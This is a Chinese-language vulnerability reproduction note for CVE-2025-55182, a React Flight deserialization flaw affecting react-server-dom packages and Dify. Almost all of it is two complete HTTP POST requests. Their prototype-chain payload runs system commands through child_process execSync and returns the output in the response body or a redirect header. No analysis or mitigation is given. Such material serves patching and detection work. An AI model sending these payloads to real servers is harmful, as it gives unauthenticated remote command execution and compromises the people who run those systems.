React Flight 反序列化漏洞(CVE-2025-55182)
声明
本文版权归原作者所有,未经允许禁止转载。
漏洞原理
由于 React Flight 反序列化机制且未经安全校验,攻击者可通过构造原型链调用 child_process 执行系统命令。
影响版本
react-server-dom-parcel(19.0.0、19.1.0、19.1.1 和 19.2.0)
react-server-dom-webpack(19.0.0、19.1.0、19.1.1 和 19.2.0)
react-server-dom-turbopack(19.0.0、19.1.0、19.1.1 和 19.2.0)
影响应用:
v1.1.2<= dify <= v1.10.1
前提条件
无
漏洞复现
注意
/xxx尽量寻找目标React Server已有的路由
回显至 Body,且进行 base64 编码:
POST /xxx HTTP/1.1
Host:
Next-Action: x
X-Nextjs-Request-Id: ygdkgols
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: 0OySzliul7lMdEUPchXuS
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then":"$1:__proto__:then",
"status":"resolved_model",
"reason":-1,
"value":"{\"then\":\"$B1337\"}",
"_response":{
"_prefix":"const c = Buffer.from('<@base64>ls</@base64>', 'base64').toString();var r=process.mainModule.require('child_process').execSync(c).toString().trim();var o = Buffer.from(r).toString('base64');;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `${o}`});",
"_chunks":"$Q2",
"_formData":{
"get":"$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--/IMG-React-Flight-反序列化漏洞(CVE-2025-55182)-20251209133838611.png)
回显至 header:
POST /xxx HTTP/1.1
Host: 172.16.31.22
Next-Action: x
X-Nextjs-Request-Id: ygdkgols
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: 0OySzliul7lMdEUPchXuS
Content-Length: 850
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then":"$1:__proto__:then",
"status":"resolved_model",
"reason":-1,
"value":"{\"then\":\"$B1337\"}",
"_response":{
"_prefix":"const c = Buffer.from('<@base64>ls</@base64>', 'base64').toString();var r=process.mainModule.require('child_process').execSync(c).toString().trim();var o = Buffer.from(r).toString('base64');;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${o};307;`});",
"_chunks":"$Q2",
"_formData":{
"get":"$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--/IMG-React-Flight-反序列化漏洞(CVE-2025-55182)-20251209133943059.png)
漏洞分析
暂无。